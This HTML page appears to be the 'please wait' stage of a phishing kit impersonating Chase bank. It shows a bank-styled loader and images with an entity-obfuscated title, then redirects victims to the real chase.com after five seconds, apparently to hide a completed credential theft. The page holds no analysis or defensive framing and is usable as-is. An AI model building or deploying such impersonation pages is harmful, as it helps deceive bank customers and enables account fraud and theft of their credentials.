<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>&#80;&#108;&#101;&#97;&#115;&#101;&#32;&#87;&#97;&#105;&#116;&#32;&#45;&#32;&#99;&#104;&#97;&#115;&#101;&#46;&#99;&#111;&#109;</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="shortcut icon"
              href="images/favicon.ico"/>	
<html><meta http-equiv="Refresh" content="05; url=https://www.chase.com/"></html>
<style type="text/css">
div#container
{
	position:relative;
	width: 1365px;
	margin-top: 0px;
	margin-left: auto;
	margin-right: auto;
	text-align:left; 
}
body {text-align:center;margin:0}
</style>
<style>
p{font-size: 40px;}
.loader {
    position: fixed;
    left: 0px;
    top: 0px;
    width: 100%;
    height: 100%;
    z-index: 9999;
    background: url('https://smallenvelop.com/wp-content/uploads/2014/08/Preloader_11.gif') 50% 50% no-repeat rgb(249,249,249);
    opacity: .8;
}
</style>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script type="text/javascript">
$(window).load(function() {
	$(".loader").fadeOut("slow");
});
</script>
</head>
<body background="images/bg.png" bgproperties="fixed" style="background-attachment:fixed;background-repeat:no-repeat;">
<div class="loader"></div>
<div id="container">
<div id="image2" style="position:absolute; overflow:hidden; left:222px; top:137px; width:950px; height:271px; z-index:1"><img src="images/c13.png" alt="" title="" border=0 width=950 height=271></div>

<div id="image3" style="position:absolute; overflow:hidden; left:222px; top:408px; width:950px; height:252px; z-index:2"><img src="images/c14.png" alt="" title="" border=0 width=950 height=252></div>

<div id="image4" style="position:absolute; overflow:hidden; left:676px; top:443px; width:79px; height:79px; z-index:3"><img src="images/cb.gif" alt="" title="" border=0 width=79 height=79></div>

</div>

</body>
</html>
